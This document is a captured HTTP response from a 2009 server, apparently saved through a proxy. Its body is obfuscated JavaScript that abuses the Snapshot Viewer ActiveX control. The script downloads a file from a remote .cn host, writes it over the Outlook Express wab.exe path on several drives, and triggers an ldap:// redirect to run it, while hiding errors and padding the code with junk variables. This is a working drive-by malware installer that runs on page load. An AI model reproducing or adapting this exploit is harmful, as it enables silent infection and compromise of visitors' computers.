HTTP/1.1 200 OK
Content-Length: 1291
ETag: "ea2f6a7c369ec91:299"
Date: Thu, 12 Mar 2009 07:32:27 GMT
Last-Modified: Fri, 06 Mar 2009 08:35:20 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Polipo-Location: http://kghytgv.cn:6135/as.htm
X-Polipo-Date: Thu, 12 Mar 2009 07:40:27 GMT
X-Polipo-Access: Thu, 12 Mar 2009 07:40:27 GMT

<script type="text/javascript">

function rpppr() 
{
var daqqp="q";
return true;
}
window.onerror = rpppr;

var x;
var dadongcar;
var tu_bj = new Array();
tu_bj[0] = "c:/Program Files/Outlook Express/wab.exe";
tu_bj[1] = "d:/Program Files/Outlook Express/wab.exe";
tu_bj[2] = "e:/Program Files/Outlook Express/wab.exe";

var dlcqaxla="gf";
var p33333s333333spspq = new ActiveXObject("\x73"+"\x6e\x70\x76\x77\x2e\x53\x6e\x61\x70\x73\x68\x6f\x74 \x56"+"\x69\x65\x77\x65\x72\x43\x6f\x6e\x74\x72\x6f\x6c\x2e"+"\x31");

if(p33333s333333spspq="[object]")
{

setTimeout('window.location = "ldap://"',3000);

for (x in tu_bj)
{
dadongcar = new ActiveXObject("\x73\x6e\x70\x76\x77\x2e\x53\x6e\x61\x70\x73\x68\x6f\x74 \x56\x69\x65\x77\x65\x72\x43\x6f\x6e\x74\x72\x6f\x6c\x2e\x31")

var tuf1 = 'http://c-0p.cn:6135/qwer/as.css';
var tuf2=tu_bj[x];

dadongcar.Zoom = 0;

dadongcar.ShowNavigationButtons = false;

dadongcar.AllowContextMenu = false;

dadongcar.SnapshotPath = tuf1;var dxdsdsd="d";


try
{
dadongcar["\x43"+"\x6f\x6d\x70\x72\x65\x73\x73\x65\x64\x50\x61\x74\x68"] = tuf2;
dadongcar["\x0050\x0072\x0069\x006e\x0074\x0053\x006e\x0061\x0070\x0073\x0068\x006f\x0074"]();var yyf="d";
}catch(e){}

}
}
var fkasacv="BS";var knasacv="BS";
</script>